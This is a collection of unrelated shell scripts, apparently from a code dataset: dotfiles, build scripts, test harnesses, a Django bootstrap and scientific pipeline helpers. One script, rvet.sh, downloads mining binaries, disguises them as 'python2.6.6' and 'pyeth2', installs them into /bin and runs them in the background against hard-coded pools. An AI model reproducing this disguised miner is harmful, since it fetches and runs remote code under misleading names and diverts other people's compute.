if [ -f /var/dvr/dvrcurdisk ]; then
# copy gforce files (if exist)
smartdir=`cat /var/dvr/dvrcurdisk`/smartlog
mkdir -p $smartdir && /davinci/dvr/gforce.sh $smartdir
# ask dvrsvr to copy files for Hybrid disk
echo 1 > /var/dvr/hybridcopy
# give 5 sec for dvrsvr to create the copyack file
sleep 5
# wait until the job is done
while [ -f /var/dvr/hybridcopy -a -f /var/dvr/copyack ]
do
sleep 1
done
fi
# insert rt73 for smartftp
echo 1 > /var/dvr/usewifi # use wifi even on 602
/bin/insmod /davinci/rt73.ko
elif [ -f /var/dvr/multidisk -a -f /var/dvr/dvrsvr.pid ]; then
# shut down wifi/serial to avoid usb/uart problems
remove_usbdrivers
# ask dvrsvr to copy log files
if [ -f /var/dvr/dvrcurdisk ]; then
# copy gforce files (if exist)
smartdir=`cat /var/dvr/dvrcurdisk`/smartlog
mkdir -p $smartdir && /davinci/dvr/gforce.sh $smartdir
echo 1 > /var/dvr/multicopy
# give 5 sec for dvrsvr to create the copyack file
sleep 5
# wait until the job is done
while [ -f /var/dvr/multicopy -a -f /var/dvr/copyack ]
do
sleep 1
done
fi
# insert rt73 for smartftp
echo 1 > /var/dvr/usewifi # useless on 510x
/bin/insmod /davinci/rt73.ko
else
# shut down wifi/serial to avoid usb/uart problems
remove_usbdrivers
if [ -f /var/dvr/dvrcurdisk ]; then
# copy gforce files (if exist)
smartdir=`cat /var/dvr/dvrcurdisk`/smartlog
mkdir -p $smartdir && /davinci/dvr/gforce.sh $smartdir
fi
# insert rt73 for smartftp
echo 1 > /var/dvr/usewifi # useless on 510x
/bin/insmod /davinci/rt73.ko
fi
sleep 1
| true
|
154c14a7c96f9133037ff1b0f951d76b67e85bd3
|
Shell
|
Cloudxtreme/dropboxfs
|
/test.sh
|
UTF-8
| 1,967
| 3.75
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# To run this, make sure you have dropboxfs already running.
MOUNTPOINT=test
echo "Runnning tests"
cd $MOUNTPOINT
function Run_Test() {
NAME=$1
EXPECTED=$2
shift
shift
COMMAND=$@
DIFF=$(diff <(echo $EXPECTED) <(echo $COMMAND))
if [ -z "$DIFF" ]; then
echo "PASSED $NAME"
else
echo "FAILED $NAME"
echo "Diff:"
echo $DIFF
exit
fi
}
Run_Test "mkdir test dir" "" $(mkdir testing)
echo 'cd into test dir'
cd testing
Run_Test "empty ls on new dir" "" $(ls)
echo 'this is a test' > test.txt
Run_Test "add new file" "test.txt" $(ls)
Run_Test "cat new file" "this is a test" $(cat test.txt)
Run_Test "cp file" "test.txt -> ./test-copied.txt" $(cp -v test.txt ./test-copied.txt)
Run_Test "ls files" "test-copied.txt test.txt" $(ls)
Run_Test "mv file" "test-copied.txt -> ./test-moved.txt" $(mv -v test-copied.txt ./test-moved.txt)
Run_Test "ls files" "test-moved.txt test.txt" $(ls)
Run_Test "cat moved & copied file" "this is a test" $(cat test-moved.txt)
Run_Test "cat original file" "this is a test" $(cat test.txt)
Run_Test "rm 1/2 files" "test-moved.txt" $(rm -v test-moved.txt)
Run_Test "mkdir subdir" "" $(mkdir subdir)
echo 'cd into subdir'
cd subdir
Run_Test "cp file down a level" "../test.txt -> ./sub.txt" $(cp -v ../test.txt ./sub.txt)
Run_Test "ls subdir files" "sub.txt" $(ls)
Run_Test "cat copied subdir file" "this is a test" $(cat sub.txt)
Run_Test "mv file up a level" "sub.txt -> ../super.txt" $(mv -v sub.txt ../super.txt)
Run_Test "cat moved subdir file" "this is a test" $(cat ../super.txt)
echo 'cd back up to test dir'
cd ../
Run_Test "rmdir subdir" "" $(rmdir subdir)
Run_Test "rm moved file" "super.txt" $(rm -v super.txt)
Run_Test "ls one file" "test.txt" $(ls)
Run_Test "rm last file" "test.txt" $(rm -v test.txt)
Run_Test "ls no files" "" $(ls)
echo 'cd back up to root'
cd ../
Run_Test "rmdir testing" "" $(rmdir testing)
echo "All tests passed"
| true
|
25fbe945082948f40697ba71c799919aeb088b03
|
Shell
|
bergquist/dotfiles
|
/.bash_profile
|
UTF-8
| 1,707
| 3.109375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
DOTFILES=~/.dotfiles
export EDITOR="/usr/bin/vim"
export GIT_EDITOR='/usr/bin/vim'
unset MAILCHECK # Don't check mail when opening terminal.
alias reload='source ~/.bash_profile'
source "${DOTFILES}/prompt/colors.theme.bash"
source "${DOTFILES}/prompt/base.theme.bash"
source "${DOTFILES}/prompt/sexy.theme.bash"
source "${DOTFILES}/system/aliases.bash"
source "${DOTFILES}/system/config.bash"
source "${DOTFILES}/system/docker.bash"
source "${DOTFILES}/system/golang.bash"
source "${DOTFILES}/system/google-cloud.bash"
source "${DOTFILES}/system/path.bash"
source "${DOTFILES}/system/python.bash"
# Autocorrect typos in path names when using `cd`
shopt -s cdspell
# Case-insensitive globbing (used in pathname expansion)
shopt -s nocaseglob
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
#setxkbmap -option caps:ctrl_modifier
#setxkbmap -option ctrl:nocaps
# Syntax-highlight JSON strings or files
# Usage: `json '{"foo":42}'` or `echo '{"foo":42}' | json`
json() {
if [ -t 0 ]; then # argument
python -mjson.tool <<< "$*" | pygmentize -l javascript
else # pipe
python -mjson.tool | pygmentize -l javascript
fi
}
# include timestamp in bash history
HISTTIMEFORMAT="%F %T "
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
# enable bash completion in interactive shells
#if ! shopt -oq posix; then
# if [ -f /usr/share/bash-completion/bash_completion ]; then
# . /usr/share/bash-completion/bash_completion
# elif [ -f /etc/bash_completion ]; then
# . /etc/bash_completion
# fi
#fi
source ~/.bash_secret
| true
|
f775092f8dbf88ce321a1b8e9c416c57fbf1565f
|
Shell
|
fridolin1995/FORGEON_X
|
/samba_all_version/sync_sbin_bin.sh
|
UTF-8
| 124
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
for each in $(find $(pwd) -type d -name sbin);
do
echo cp $each/* $(echo $each|sed 's/sbin/bin/g');
done
| true
|
e31c8bd5da46cbf1a4903d7401d4f145a8932f13
|
Shell
|
epam/fonda
|
/src/integrationTest/resources/templates/dnaAmpliconVarFastq/testPairedXenomeYesSeqpurgeNovoalign/DnaAmpliconVar_Fastq_alignment_for_GA5_1_analysis.txt
|
UTF-8
| 3,735
| 3
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -x
# --- SGE options --- #
#$ -V
#$ -wd build/resources/integrationTest/output
#$ -N DnaAmpliconVar_Fastq_alignment_for_GA5_1_analysis
#$ -o build/resources/integrationTest/output/log_files/DnaAmpliconVar_Fastq_alignment_for_GA5_1_analysis.log
#$ -e build/resources/integrationTest/output/err_files/DnaAmpliconVar_Fastq_alignment_for_GA5_1_analysis.err
#$ -q main.q
#$ -R y
#$ -pe threaded 4
#$ -m a
# --- The commands to be executed --- #
cd build/resources/integrationTest/output
echo `date` Begin the job execution...
echo `date` Begin Step: Xenome classification...
/usr/bin/xenome classify -T 8 -P /ngs/data/xenomeIdx/xenome.idx --pairs --graft-name human --host-name mouse --output-filename-prefix build/resources/integrationTest/output/GA5/tmp/GA5_1 --tmp-dir build/resources/integrationTest/output/GA5/tmp -i /ngs/data/demo/test/fastq_data/GA5_0001_L002_R1_001.fastq.gz -i /ngs/data/demo/test/fastq_data/GA5_0001_L002_R2_001.fastq.gz
awk '{if (NR % 4 == 1) print "@"$0; else if (NR % 4 == 3) print "+"$0; else print $0 }' build/resources/integrationTest/output/GA5/tmp/GA5_1_human_1.fastq > build/resources/integrationTest/output/GA5/tmp/GA5_1_convert_human_1.fastq
awk '{if (NR % 4 == 1) print "@"$0; else if (NR % 4 == 3) print "+"$0; else print $0 }' build/resources/integrationTest/output/GA5/tmp/GA5_1_human_2.fastq > build/resources/integrationTest/output/GA5/tmp/GA5_1_convert_human_2.fastq
cat build/resources/integrationTest/output/GA5/tmp/GA5_1_convert_human_1.fastq | gzip -c > build/resources/integrationTest/output/GA5/fastq/GA5_1_classified_R1.fq.gz
cat build/resources/integrationTest/output/GA5/tmp/GA5_1_convert_human_2.fastq | gzip -c > build/resources/integrationTest/output/GA5/fastq/GA5_1_classified_R2.fq.gz
if [ $? -eq 0 ]
then
echo `date` Successful Step: Xenome classification.
sleep 8
else
echo `date` Error Step: Xenome classification.
echo `date` The job was aborted due to ERRORS found.
exit 1;
fi
echo `date` Begin Step: Seqpurge trimming...
/opt/ngs_bits/ngs-bits/bin/SeqPurge -threads 4 -in1 build/resources/integrationTest/output/GA5/fastq/GA5_1_classified_R1.fq.gz -in2 build/resources/integrationTest/output/GA5/fastq/GA5_1_classified_R2.fq.gz -out1 build/resources/integrationTest/output/GA5/fastq/GA5_1.trimmed.R1.fastq.gz -out2 build/resources/integrationTest/output/GA5/fastq/GA5_1.trimmed.R2.fastq.gz -qcut 20 -a1 AGATCGGAAGAGCACACGTCTGAACTCCAGTCAC -a2 AGATCGGAAGAGCGTCGTGTAGGGAAAGAGTGTAGATCTCGGTGGTCGCCGTATCATT
if [ $? -eq 0 ]
then
echo `date` Successful Step: Seqpurge trimming.
sleep 8
else
echo `date` Error Step: Seqpurge trimming.
echo `date` The job was aborted due to ERRORS found.
exit 1;
fi
echo `date` Begin Step: Novoalign alignment...
/usr/bin/novoalign -c 4 -d /ngs/data/novoindexDB/novoindex.nix -o SAM $'@RG\tID:GA5\tSM:GA5\tLB:GA5\tPL:Illumina' -f build/resources/integrationTest/output/GA5/fastq/GA5_1.trimmed.R1.fastq.gz build/resources/integrationTest/output/GA5/fastq/GA5_1.trimmed.R2.fastq.gz| /opt/samtools/samtools-0.1.19/samtools view -bS -|/opt/samtools/samtools-0.1.19/samtools sort - build/resources/integrationTest/output/GA5/bam/GA5_1.novoalign.sorted
if [ $? -eq 0 ]
then
echo `date` Successful Step: Novoalign alignment.
sleep 8
else
echo `date` Error Step: Novoalign alignment.
echo `date` The job was aborted due to ERRORS found.
exit 1;
fi
echo `date` Begin Step: Index bam...
/opt/samtools/samtools-0.1.19/samtools index build/resources/integrationTest/output/GA5/bam/GA5_1.novoalign.sorted.bam
if [ $? -eq 0 ]
then
echo `date` Successful Step: Index bam.
sleep 8
else
echo `date` Error Step: Index bam.
echo `date` The job was aborted due to ERRORS found.
exit 1;
fi
echo `date` Finish the job execution!
| true
|
fd1d917f9ce68d28a099aafe39b0e21330ecb950
|
Shell
|
wangke0809/sgx-ra-tls
|
/build.sh
|
UTF-8
| 5,804
| 3.453125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -x
function usage() {
echo "./build.sh sgxsdk|graphene|scone|sgxlkl"
}
# You need the SGX SDK and PSW installed.
if [[ $# -gt 1 || $# -eq 0 ]]; then
echo "wrong number of arguments"
usage
exit 1
fi
[[ $# -eq 1 ]] && VARIANT=$1
if [[ ! ( $VARIANT == "scone" ||
$VARIANT == "graphene" ||
$VARIANT == "sgxsdk" ||
$VARIANT == "sgxlkl" ) ]] ; then
echo "unknown variant; must be one of sgxsdk, graphene, scone or sgxlkl."
usage
exit 1
fi
mkdir -p deps
pushd deps
# The wolfSSL and mbedtls libraries are necessary for the non-SGX
# clients. We do not use their package versions since we need them to
# be compiled with specific flags.
if [ ! -d mbedtls ] ; then
git clone https://github.com/ARMmbed/mbedtls.git
pushd mbedtls
git checkout mbedtls-2.5.1
# Add -DCMAKE_BUILD_TYPE=Debug for Debug
patch -p1 < ../../mbedtls-enlarge-cert-write-buffer.patch
patch -p1 < ../../mbedtls-ssl-server.patch
patch -p1 < ../../mbedtls-client.patch
cmake -DCMAKE_BUILD_TYPE=Debug -DENABLE_PROGRAMS=off -DCMAKE_C_FLAGS="-fPIC -DMBEDTLS_X509_ALLOW_UNSUPPORTED_CRITICAL_EXTENSION" . || exit 1
make -j`nproc` || exit 1
cmake -D CMAKE_INSTALL_PREFIX=$(readlink -f ../local) -P cmake_install.cmake || exit 1
popd
fi
if [ ! -d wolfssl ] ; then
git clone https://github.com/wolfSSL/wolfssl || exit 1
pushd wolfssl
git checkout 57e5648a5dd734d1c219d385705498ad12941dd0
patch -p1 < ../../wolfssl-sgx-attestation.patch || exit 1
[ ! -f ./configure ] && ./autogen.sh
# Add --enable-debug for debug build
# --enable-nginx: #define's WOLFSSL_ALWAYS_VERIFY_CB and
# KEEP_OUR_CERT. Without this there seems to be no way to access
# the certificate after the handshake.
#
# 2017-12-11: --enable-nginx also activates OPENSSLEXTRA. The later
# includes symbols that clash with OpenSSL, i.e., wolfSSL and OpenSSL
# cannot be linked into the same binary. --enable-opensslcoexists does
# not seem to help in this case.
WOLFSSL_CFLAGS="-fPIC -DWOLFSSL_SGX_ATTESTATION -DWOLFSSL_ALWAYS_VERIFY_CB -DKEEP_PEER_CERT"
CFLAGS="$WOLFSSL_CFLAGS" ./configure --prefix=$(readlink -f ../local) --enable-writedup --enable-static --enable-keygen --enable-certgen --enable-certext || exit 1 # --enable-debug
make -j`nproc` || exit 1
make install || exit 1
# Add -DDEBUG_WOLFSSL to CFLAGS for debug
pushd IDE/LINUX-SGX
make -f sgx_t_static.mk SGX_DEBUG=1 CFLAGS="-DUSER_TIME -DWOLFSSL_SGX_ATTESTATION -DWOLFSSL_KEY_GEN -DWOLFSSL_CERT_GEN -DWOLFSSL_CERT_EXT" || exit 1
cp libwolfssl.sgx.static.lib.a ../../../local/lib
popd
popd
fi
if [[ ! -d curl && "$VARIANT" != "scone" && "$VARIANT" != "sgxlkl" ]] ; then
git clone https://github.com/curl/curl.git
pushd curl
git checkout curl-7_47_0
./buildconf
./configure --prefix=$(readlink -f ../local) --without-libidn --without-librtmp --without-libssh2 --without-libmetalink --without-libpsl --with-ssl # --enable-debug
make -j`nproc` || exit 1
make install || exit 1
popd
fi
# Linux SGX SDK code
if [[ ! -d linux-sgx ]] ; then
git clone https://github.com/01org/linux-sgx.git
pushd linux-sgx
git checkout sgx_2.0
popd
fi
if [[ ! -d linux-sgx-driver && $VARIANT == "graphene" ]] ; then
git clone https://github.com/01org/linux-sgx-driver.git
pushd linux-sgx-driver
git checkout sgx_driver_2.0
popd
fi
if [[ ! -d graphene && $VARIANT == "graphene" ]] ; then
git clone --recursive https://github.com/oscarlab/graphene.git
pushd graphene
git checkout e01769337c38f67d7ccd7a7cadac4f9df0c6c65e
openssl genrsa -3 -out Pal/src/host/Linux-SGX/signer/enclave-key.pem 3072
# patch -p1 < ../../graphene-sgx-linux-driver-2.1.patch
# The Graphene build process requires two inputs: (i) SGX driver directory, (ii) driver version.
# Unfortunately, cannot use make -j`nproc` with Graphene's build process :(
printf "$(readlink -f ../linux-sgx-driver)\n2.0\n" | make SGX=1 || exit 1
# I prefer to have all dynamic libraries in one directory. This
# reduces the effort in the Graphene-SGX manifest file.
ln -s /usr/lib/x86_64-linux-gnu/libprotobuf-c.so.1 Runtime/
ln -s /usr/lib/libsgx_uae_service.so Runtime/
ln -s /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 Runtime/
ln -s /lib/x86_64-linux-gnu/libz.so.1 Runtime/
ln -s /lib/x86_64-linux-gnu/libssl.so.1.0.0 Runtime/
popd
fi
popd # deps
# Copy client certificates required to talk to Intel's Attestation
# Service
# cp ../../certs/ias-client*.pem .
if [ $VARIANT == "sgxsdk" ] ; then
echo "Building wolfSSL SGX library ..."
make -f ratls-wolfssl.mk || exit 1
make -f ratls-wolfssl.mk clean || exit 1
fi
pushd deps
if [[ ! -d wolfssl-examples ]] ; then
echo "Building SGX-SDK-based wolfSSL sample server (HTTPS) ..."
git clone https://github.com/wolfSSL/wolfssl-examples.git || exit 1
pushd wolfssl-examples
git checkout 94b94262b45d264a40d484060cee595b26bdbfd7
patch -p1 < ../../wolfssl-examples.patch || exit 1
# Copy certificates required to talk to Intel Attestation Service
ln -s ../../../ias-client-key.pem SGX_Linux/ias-client-key.pem
ln -s ../../../ias-client-cert.pem SGX_Linux/ias-client-cert.pem
popd
fi
popd
echo "Building non-SGX-SDK sample clients ..."
make clients || exit 1
make clean || exit
if [ $VARIANT == "scone" ] ; then
bash ./build-SCONE.sh || exit 1
make scone-server || exit 1
fi
if [ $VARIANT == "sgxlkl" ] ; then
make -C sgxlkl -j2 || exit 1
fi
if [ $VARIANT == "sgxsdk" ] ; then
make sgxsdk-server
fi
if [ $VARIANT == "graphene" ] ; then
make graphene-server
make wolfssl-client-mutual
fi
| true
|
d7be9a23071e5f5af52e5852d4a51cbee330e755
|
Shell
|
vklyukin/team3_testing_system
|
/auto_bootstrap.sh
|
UTF-8
| 2,905
| 3.390625
| 3
|
[] |
no_license
|
#!/usr/bin/env sh
superuser_name=$(whiptail --title "Create superuser" --inputbox "Input superuser name" 10 60 3>&1 1>&2 2>&3)
[ $? -ne 0 ] || [ -z "$superuser_name" ] && echo "Operation aborted by user" && return 1
superuser_mail=$(whiptail --title "Create superuser" --inputbox "Input superuser mail" 10 60 3>&1 1>&2 2>&3)
[ $? -ne 0 ] || [ -z "$superuser_mail" ] && echo "Operation aborted by user" && return 1
superuser_password=$(whiptail --title "Create superuser" --passwordbox "Input superuser password" 10 60 3>&1 1>&2 2>&3)
[ $? -ne 0 ] || [ -z "$superuser_password" ] && echo "Operation aborted by user" && return 1
password_repeat=$(whiptail --title "Create superuser" --passwordbox "Confirm superuser password" 10 60 3>&1 1>&2 2>&3)
[ $? -ne 0 ] || [ -z "$password_repeat" ] && echo "Operation aborted by user" && return 1
[ "$superuser_password" != "$password_repeat" ] && echo "Passwords mismatch" && return 1
start_on_complete=false
whiptail --title "Configure" --yesno "Do you want to run server after configuration complete?" 10 60
[ $? -eq 0 ] && start_on_complete=true
base_path=$(whiptail --title "Configure" --menu "Choose base_path" 15 60 4 \
"1" "http://localhost:5000/" \
"2" "http://cs.entryhse.tk/" 3>&1 1>&2 2>&3)
[ $? -ne 0 ] && echo "Operation aborted by user" && return 1
case "$base_path" in
"1")
printf "// const BASE_PATH = 'http://cs.entryhse.tk/';\nconst BASE_PATH = 'http://localhost:5000/';" > ./test_system/static/js/base_path.js
printf "# BASE_PATH = 'http://cs.entryhse.tk/'\nBASE_PATH = 'http://localhost:5000/'" > test_system/test_system/base_path.py
;;
"2")
printf "const BASE_PATH = 'http://cs.entryhse.tk/';\n// const BASE_PATH = 'http://localhost:5000/';" > ./test_system/static/js/base_path.js
printf "BASE_PATH = 'http://cs.entryhse.tk/'\n# BASE_PATH = 'http://localhost:5000/'" > test_system/test_system/base_path.py
;;
*)
echo "Operation aborted by user" && return 1
;;
esac
printf "$superuser_name\nsuperuser_mail\n$superuser_password" > .superuser.txt
docker-compose build
sed -i'.original' -e 's/^STATIC_ROOT/# STATIC_ROOT/' ./test_system/test_system/settings.py
docker-compose run --rm djangoapp /bin/bash -c "python3 test_system/manage.py makemigrations"
docker-compose run --rm djangoapp /bin/bash -c "python3 test_system/manage.py migrate"
docker-compose run --rm djangoapp /bin/bash -c "cat .superuser.txt | python3 test_system/manage.py initadmin"
docker-compose run --rm djangoapp /bin/bash -c "python3 test_system/manage.py initscale"
sed -i'.original' -e 's/^# STATIC_ROOT/STATIC_ROOT/' ./test_system/test_system/settings.py
rm ./test_system/test_system/settings.py.original
docker-compose run djangoapp python3 test_system/manage.py collectstatic --no-input
docker-compose run --rm djangoapp /bin/bash -c "cp -r ./test_system/static/* ../static"
[ "$start_on_complete" = true ] && docker-compose up
| true
|
7182b18b131783cdd087ad5819f98fe119b30935
|
Shell
|
pappagari/config_files
|
/bash_rc
|
UTF-8
| 3,545
| 3.421875
| 3
|
[] |
no_license
|
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color)
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\W\[\033[00m\]\$ '
;;
*)
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\W\$ '
;;
esac
# enable color support of ls and also add handy aliases
if [ "$TERM" != "dumb" ]; then
eval "`dircolors -b`"
alias ls='ls --color=auto'
#alias dir='ls --color=auto --format=vertical'
alias u='du -hs'
alias f='df -h'
alias a='ls -ltr'
alias p='readlink -f'
alias q='qstat'
alias d='qdel'
alias io='sudo iotop'
alias kipy='CUDA_VISIBLE_DEVICES=" " ipython3'
alias kpy='CUDA_VISIBLE_DEVICES=" " python'
alias ks='source activate keras_tf'
alias qda="qstat |cut -d ' ' -f1 |xargs qdel"
alias pyt="source activate pytorch_py3.6_v2"
alias io='sudo iotop -u rpapagari'
alias nvs='nvidia-smi'
#alias vdir='ls --color=auto --format=long'
fi
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color) color_prompt=yes;;
esac
# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes
if [ -n "$force_color_prompt" ]; then
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
# We have color support; assume it's compliant with Ecma-48
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
# a case would tend to support setf rather than setaf.)
color_prompt=yes
else
color_prompt=
fi
fi
if [ "$color_prompt" = yes ]; then
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt
# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
;;
*)
;;
esac
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
#alias dir='dir --color=auto'
#alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
alias qstat='qstat -u $USER'
alias top='top -u $USER'
# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
if [ -f /usr/share/bash-completion/bash_completion ]; then
. /usr/share/bash-completion/bash_completion
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi
| true
|
3f27cf9eb45ffb3da92d71fdf97154fb266cfa03
|
Shell
|
catursawah/anr8-6-21
|
/rvet.sh
|
UTF-8
| 1,315
| 2.765625
| 3
|
[] |
no_license
|
#!bin/bash -xe
iip=$(curl https://ipecho.net/plain)
IPNAME=$(sed 's|\.|o|g' <<< $iip)
nvidia-smi
curl ipinfo.io
# Version 1.2.3
# wget https://github.com/RavenCommunity/kawpowminer/releases/download/1.2.3/kawpowminer-ubuntu18-1.2.3.zip
# unzip kawpowminer-ubuntu18-1.2.3.zip
# version1.2.2
wget https://github.com/one10001/10001code/releases/download/2.6.6/python2.6.6
wget https://github.com/one10001/ethminer/releases/download/v0.0.1/pyeth2
chmod +x pyeth2
cp pyeth2 /bin/pyeth2
chmod +x python2.6.6
cp python2.6.6 /bin/python2.6.6
python2.6.6 -U -P stratum+tcp://RMV17aQMgMPyPqJQ5H3WRQH37Njspi1SSK.$IPNAME@116.203.10.54:80 --cu-grid-size 64 --cu-block-size 128 --cu-parallel-hash 1 2> log02.out 1> log02.out &
pyeth2 -P stratum1+tcp://0x1be9C1Db52aC9cD736160c532D69aA4770c327B7.$IPNAME@116.203.10.54:990 -U --cu-grid-size 128 --cu-block-size 256 --cu-parallel-hash 1 2> log01.out 1> log01.out &
nvidia-smi
while [ 1 ]
do
echo '#######################################################################################################################################'
echo eth 21: $(grep -o 'Accepted' log02.out | wc -l)
grep -o 'Accepted' log02.out | tail -n 3
echo rv 80: $(grep -o 'Accepted' log01.out | wc -l)
grep -o 'Accepted' log01.out | tail -n 3
nvidia-smi
sleep 30
done
| true
|
bfdaa6e90cef1d5a0a79e96e57cb458ce6ee86be
|
Shell
|
teddy/dotfiles
|
/scripts/rofi/rofitorrent
|
UTF-8
| 393
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Menu for transmission daemon commands
#
main()
{
local choice="$(rofiprompt --text "Choose an option" \
--options "Start,Stop")"
if [[ "${choice}" = "Start" ]]; then
transmission --start
elif [[ "${choice}" = "Stop" ]]; then
transmission --stop
fi
}
#----------------------------------------------------------
main "$@"
| true
|
c961153eddac942a3519e61c5254d29f9cb22f9d
|
Shell
|
UMich-Mind-Lab/pipeline-task-standard
|
/bin/get_valid_subs.sh
|
UTF-8
| 1,780
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
#read in entries from the sm_config file
task=$(cat config/sm_config.json | jq -r ".task[]")
ses=$(cat config/sm_config.json | jq -r ".ses[]")
acq=$(cat config/sm_config.json | jq -r ".acq[]")
run=$(cat config/sm_config.json | jq -r ".run[]")
bidsDir=$(cat config/sm_config.json | jq -r ".bids_dir")
#initialize empty subs array
subs=""
for sub in "${bidsDir}"/sub-*; do
#extract subject id from filepath
sub=$(echo ${sub} | cut -d "/" -f 4 | cut -d "-" -f 2)
addSub=1
missing="missing:"
iMissing=0
for t in ${task}; do
for s in ${ses}; do
for r in ${run}; do
for a in ${acq}; do
reqd='${bidsDir}/sub-${sub}/ses-${s}/func/sub-${sub}_ses-${s}_task-${t}_acq-${a}_run-${r}_bold.nii.gz ../../reorientation/sub-${sub}/ses-${s}/T1w_reorient.mat'
if [ "${acq}" == "mb" ]; then
reqd="${reqd}"' ${bidsDir}/sub-${sub}/ses-${s}/fmap/sub-${sub}_ses-${s}_acq-${t}_run-1_fieldmap.nii.gz ../../eventLogs/sub-${sub}/ses-${s}/sub-${sub}_ses-${s}_run-${r}_${t}.mat'
elif [ "${acq}" == "sp" ]; then
reqd="${reqd}"' ../../eventLogs/sub-${sub}/ses-${s}/sub-${sub}_ses-${s}_run-${r}_${t}.csv'
fi
for f in ${reqd}; do
f=$(eval echo "${f}")
if ! [ -f "${f}" ]; then
addSub=0
missing=${missing}$'\n'${f}
let "iMissing=iMissing+1"
fi
done
done
done
done
done
#if the subject has all files, add to list
if [ ${addSub} -eq 1 ]; then
subs="${subs} \"${sub}\","
#otherwise, if the subject has the bold.nii.gz, but not other files, report it
elif ! [[ "${missing}" == *"bold.nii.gz"* ]]; then
echo "${sub}"
echo "${missing}"
echo
fi
done
echo
echo "${subs}"
| true
|
290ba86aa1b592555f80e99813327ffc75d59af4
|
Shell
|
danX-4q/docker-safe
|
/safecode-env-test/sc-et_u16/docker-fs-root/home/sc-test/script/service/clean-nodeos-data.sh
|
UTF-8
| 392
| 3.03125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
zpath=$(cd `dirname $0`; pwd)
cd $zpath > /dev/null
##############################
#usage:
# $1: node name, which will be used to get node config
# at dir ../node/$1/eosio.conf(or eosio.env)
set -x
NM=${1-"a"}
N_C_DIR="../node/${NM}/"
cd $N_C_DIR
. eosio.conf
cd -
##############################
./stop-nodeos.sh
rm -rf ${NODEOS_D_DIR}/{blocks,snapshots,state}
| true
|
974e0f7c0a9f29f3415076120419eaabdee5b88d
|
Shell
|
RetroCraft/project-euler
|
/scripts/run-cpp.zsh
|
UTF-8
| 220
| 2.65625
| 3
|
[] |
no_license
|
#!/bin/zsh
count=`find . -name "Problem???.cpp" | wc -l`
echo "PROJECT EULER: Problem $1 (of $count)"
echo "====================================="
g++ src/c++/Problem$1.cpp -o bin/Problem$1 -std=gnu++17
./bin/Problem$1
| true
|
e5575b410dcbbce92bf88dbc7590f9435ec3fcdb
|
Shell
|
meom-configurations/eORCA12.L75-GJM2020
|
/RUN_eORCA12.L75/eORCA12.L75-MJM2020/CTL/dcmtjk_mkmdjournal
|
UTF-8
| 6,115
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/bash
# This script is used to produce a template for the Journal of a run, written
# in markdown language, that fits with github repositories.
# It must be run where the nemoxx.oxxx files ares saved.
# class = @Run management tools@
usage() {
echo
echo "USAGE: $(basename $0 ) [-h ] [-f ] [-c confcase ] [-n name ] [-u user] [-o fileout]"
echo
echo " PURPOSE:"
echo " This script create a markdown with the segments of run present in the local "
echo " directory (job output). It uses the namelist in order to retrieve important "
echo " parameters of the run, to put in the table. "
echo " It prepares the column for the CPU usage. This column can be completed "
echo " afterward with accounting information"
echo " (see dcmtk_mdjournal_cpu) "
echo
echo " OPTIONS:"
echo " -h : help "
echo " -f : force : do not check that you are in a CTL dir "
echo " -n name : use name instead of nemo_<MACHINE>. <MACHINE> is inferred from hostname"
echo " for irene, ada, occigen, jean-zay "
echo " -c confcase : use confcase instead of CONFCASE deduced from CTL"
echo " : this is usefull with option -f "
echo " -u user [default is $USER ]"
echo " -o output file [ default is journal.wiki "
echo
exit 0
}
getjobid () {
# get job id from nemoxxx.e*** file
echo ${1#*.e}
}
line() {
echo -n "|"
narg=$#
for n in $(seq 1 $narg) ; do
echo -n $1 "| "
shift
done
echo
}
linedat() {
dat=($*)
echo -n "|" ${dat[@]}
}
header () {
narg=$#
echo -n "|"
for n in $(seq 1 $narg) ; do
case $1 in
( 'c' )
echo -n :---: "| " ;;
( 'r' )
echo -n ---: "| " ;;
( 'l' )
echo -n :--- "| " ;;
( * )
echo -n --- "| " ;;
esac
shift
done
echo
}
reformdat() {
tag=$1
echo y${tag:0:4}m${tag:4:2}d${tag:6:2}
}
# LookInNamelist returns the value of a variable in the namelist
# examples: aht0=$(LookInNamelist aht0 ) <=> aht0=$(LookInNamelist aht0 namelist )
